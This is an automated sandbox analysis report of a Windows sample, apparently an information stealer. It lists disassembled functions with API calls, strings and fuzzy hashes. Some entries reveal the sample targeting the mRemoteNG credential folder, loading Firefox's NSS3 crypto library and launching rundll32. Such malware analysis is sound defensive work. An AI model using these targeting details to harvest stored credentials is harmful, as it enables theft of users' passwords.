lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,04147DF8,04147DF8,?,0040F76C,?,04147DF8), ref: 00415990
lstrlen.KERNEL32(?,?,0040F76C,?,04147DF8), ref: 004159A7
wsprintfA.USER32 ref: 004159C7

Strings

%s%s, xrefs: 004159B5
C:\Users\user\AppData\Roaming\mRemoteNG\, xrefs: 0041598B, 004159C0, 004159D0

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
API String ID: 1206339513-1027354905
Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

"" , xrefs: 004111DC
C:\Windows\system32\rundll32.dll, xrefs: 004110BF
<, xrefs: 004112AC
.dll, xrefs: 00411054

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 6e7a0100c6f31bb2b4830e58b644d3e2cd34d3a7405b32bd71eb4f71f658ead2
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 6e7a0100c6f31bb2b4830e58b644d3e2cd34d3a7405b32bd71eb4f71f658ead2
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6CDFAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDFAFDA

Strings

%s at line %d of [%.10s], xrefs: 6CDFAFD3
unable to delete/modify collation sequence due to active statements, xrefs: 6CDFAF5C
misuse, xrefs: 6CDFAFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDFAFC4

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 497c417e4a19c628b2f71dbd35000000114c926dbdbc5d91c3bad8cfabbf1b08
Instruction ID: 09ffe48e90b7f704380901ecbe597bd5f57c60b6a90cb980ac83d38e479135aa
Opcode Fuzzy Hash: 497c417e4a19c628b2f71dbd35000000114c926dbdbc5d91c3bad8cfabbf1b08
Instruction Fuzzy Hash: 9C91C475B01215CFDB04CF59C854BAAB7F1BF45314F1A85A8E8A9AB7A1D334ED02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF24F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CF24F5D
free.MOZGLUE(?), ref: 6CF24F74
free.MOZGLUE(?), ref: 6CF24F82
GetLastError.KERNEL32 ref: 6CF24F90

Strings

5s/, xrefs: 6CF24F0C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID: 5s/
API String ID: 17951984-340167759
Opcode ID: 5878dd5a29cafae921a66c49bc0b6d7c56b71ea0550103aa0dc9ca5746e0f002
Instruction ID: 2dd266cb79f2b4a7a5367881755f5e6f3019af000c4f6c11ba35aa9021e968d1
Opcode Fuzzy Hash: 5878dd5a29cafae921a66c49bc0b6d7c56b71ea0550103aa0dc9ca5746e0f002
Instruction Fuzzy Hash: 6D314876A002095BEF11CFA9DC81BDFB7B8EF85348F040229EC65A7681D778A90586A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD9E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD9E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD9E5BC

Strings

%s at line %d of [%.10s], xrefs: 6CD9E534, 6CD9E5B6
database corruption, xrefs: 6CD9E52F, 6CD9E5B1
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD9E525, 6CD9E596, 6CD9E5A7

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: f3f7da150115bc7a7c324b0b2c6e44640dd947b4319678247bdab7adc229570e
Instruction ID: 9ac673b7365eeb0d7ff07f1116651d4fc7040f20bcd0e528ce0227ab6d5121d0
Opcode Fuzzy Hash: f3f7da150115bc7a7c324b0b2c6e44640dd947b4319678247bdab7adc229570e
Instruction Fuzzy Hash: DB317538600B11DBC3118FADC8808AAB7A1FB41714B544D7DE888A7FA6F361E949C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 6CEBA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CEA2AE9,00000000,0000065C), ref: 6CEBA91D

Part of subcall function 6CE5ADC0: TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE10
Part of subcall function 6CE5ADC0: EnterCriticalSection.KERNEL32(?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE24
Part of subcall function 6CE5ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CE3D079,00000000,00000001), ref: 6CE5AE5A
Part of subcall function 6CE5ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE6F
Part of subcall function 6CE5ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE7F
Part of subcall function 6CE5ADC0: TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEB1
Part of subcall function 6CE5ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CEA2AE9,00000000,0000065C), ref: 6CEBA934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6CEA2AE9,00000000,0000065C), ref: 6CEBA949
free.MOZGLUE(?,00000000,0000065C), ref: 6CEBA952

Strings

*l, xrefs: 6CEBA8F6

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *l
API String ID: 1595327144-2445014310
Opcode ID: 5e50a46406ee1858d4a180e1d3ebdaed954c04952f16c828b5ff0afa38dffb21
Instruction ID: a5da8063d3e3e6d3828bd56a995773ca7393c4cb5c5efb95d7864d6f426bf261
Opcode Fuzzy Hash: 5e50a46406ee1858d4a180e1d3ebdaed954c04952f16c828b5ff0afa38dffb21
Instruction Fuzzy Hash: 5D314DB4601211DFDB04CF15EA90E62BBF8FF48358B2581A9E8199F756E731E811CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE16420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6CE15DEF,?,?,?), ref: 6CE16456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6CE15DEF,?,?,?), ref: 6CE16476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6CE15DEF,?,?,?), ref: 6CE164A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6CE15DEF,?,?,?), ref: 6CE164C2

Strings

]l, xrefs: 6CE16489

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID: ]l
API String ID: 3886907618-3662268921
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: 3a3c685594fb22b7f1ad9cb30d0f902da111f776de43d753d9cfd9c66d64f03c
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: 4221D5B1A082516BEB209E29DC45B6376FDFB4030CF344538F91AC6F41E7B2D568C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE004D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6CE004F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE0053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE00558
GetLastError.KERNEL32 ref: 6CE0057A

Strings

5s/, xrefs: 6CE004DC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID: 5s/
API String ID: 3051374878-340167759
Opcode ID: 700cbbce8462da142b428756ef34b7729f140083ff3cb4f7d0f2e3207e8bbb26
Instruction ID: 6af1908b4b5565cfb7fa8fc330a399d6a224d461bfe2cd43c73a848b9063f5c3
Opcode Fuzzy Hash: 700cbbce8462da142b428756ef34b7729f140083ff3cb4f7d0f2e3207e8bbb26
Instruction Fuzzy Hash: 72214F71B00119AFDB04DF69DC94AAEB7B8FF49308B10802DE8199B351D731E906CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3ACB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CE3ACC2

Part of subcall function 6CE12F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE12F0A
Part of subcall function 6CE12F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE12F1D

Part of subcall function 6CE12AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CE10A1B,00000000), ref: 6CE12AF0
Part of subcall function 6CE12AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE12B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CE3AD5E

Part of subcall function 6CE557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CE1B41E,00000000,00000000,?,00000000,?,6CE1B41E,00000000,00000000,00000001,?), ref: 6CE557E0
Part of subcall function 6CE557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CE55843

CERT_DestroyCertList.NSS3(?), ref: 6CE3AD36

Part of subcall function 6CE12F50: CERT_DestroyCertificate.NSS3(?), ref: 6CE12F65
Part of subcall function 6CE12F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE12F83

free.MOZGLUE(?), ref: 6CE3AD4F

Strings

5s/, xrefs: 6CE3ACB8

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID: 5s/
API String ID: 132756963-340167759
Opcode ID: 3aaba17d21723475cf9f408e4b7be66114aa0c60db26606b333a5f14b6206be5
Instruction ID: fc0e31afc914638da1d1c554d817164ca1cc6e5e8d5ad87d01d54487752937db
Opcode Fuzzy Hash: 3aaba17d21723475cf9f408e4b7be66114aa0c60db26606b333a5f14b6206be5
Instruction Fuzzy Hash: B021C6B1D002249BEF11DFA4D8065EEB7B4AF1620CF66506CD8487B710FB31BA95CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE524E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE524FF
EnterCriticalSection.KERNEL32(?), ref: 6CE5250F
PR_Unlock.NSS3(?), ref: 6CE5253C
PR_SetError.NSS3(00000000,00000000), ref: 6CE52554

Strings

5s/, xrefs: 6CE524EC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID: 5s/
API String ID: 284873373-340167759
Opcode ID: 9f7325b4d180a4ab0789f8a435b2f58f3fea2fcf4392181ef8147079956108db
Instruction ID: 04213d0bc5326eca024aacf21ee2bfbd85f831769ecfe4497a933459b09c9c18
Opcode Fuzzy Hash: 9f7325b4d180a4ab0789f8a435b2f58f3fea2fcf4392181ef8147079956108db
Instruction Fuzzy Hash: 2011E975E00114ABDF40AF68DC45ABB7B78EF46328B654128EC08A7311E731E955C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE00DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CE00BDE), ref: 6CE00DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CE00BDE), ref: 6CE00DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CE00BDE), ref: 6CE00DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CE00BDE), ref: 6CE00E32

Strings

%s incr => %d (find lib), xrefs: 6CE00E2D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 2781c9ba23b449e7d8afc1cf44e45a4c8d06c7c83bc02874304d032771d2223f
Instruction ID: cd0599a0ad923c8ade67499dc6112f059d672a16c45b3d0a2c28815327346cff
Opcode Fuzzy Hash: 2781c9ba23b449e7d8afc1cf44e45a4c8d06c7c83bc02874304d032771d2223f
Instruction Fuzzy Hash: CF012472B002209FEB209F649C45E5773BCDB45A09B24482DE909E3B41E762FC2986E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEBAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]l,00000000,?,?,6CE96AC6,?), ref: 6CEBAC2D

Part of subcall function 6CE5ADC0: TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE10
Part of subcall function 6CE5ADC0: EnterCriticalSection.KERNEL32(?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE24
Part of subcall function 6CE5ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CE3D079,00000000,00000001), ref: 6CE5AE5A
Part of subcall function 6CE5ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE6F
Part of subcall function 6CE5ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE7F
Part of subcall function 6CE5ADC0: TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEB1
Part of subcall function 6CE5ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEC9

PK11_FreeSymKey.NSS3(?,@]l,00000000,?,?,6CE96AC6,?), ref: 6CEBAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]l,00000000,?,?,6CE96AC6,?), ref: 6CEBAC59
free.MOZGLUE(8CB6FF01,6CE96AC6,?,?,?,?,?,?,?,?,?,?,6CEA5D40,00000000,?,6CEAAAD4), ref: 6CEBAC62

Strings

@]l, xrefs: 6CEBAC05

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]l
API String ID: 1595327144-728282480
Opcode ID: 44ee1caf8396c8eb5799fec4588a203a0b3dcf9bedfc6296bb946572aed57c18
Instruction ID: aa0b3250e6c5f6f0d760c347d88df5a18c5f61a35931553cfe7e866997fb0366
Opcode Fuzzy Hash: 44ee1caf8396c8eb5799fec4588a203a0b3dcf9bedfc6296bb946572aed57c18
Instruction Fuzzy Hash: 0C0128B56402009BDF00DF59EAD0B6677B8AB44B5CF288068E9499F706D735F848CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD9A8E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6CECA480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CEEC3A2,?,?,00000000,00000000), ref: 6CECA528
Part of subcall function 6CECA480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CECA6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD9A94F

Strings

%s at line %d of [%.10s], xrefs: 6CD9A948
5s/, xrefs: 6CD9A8EA
database corruption, xrefs: 6CD9A943
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD9A939

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

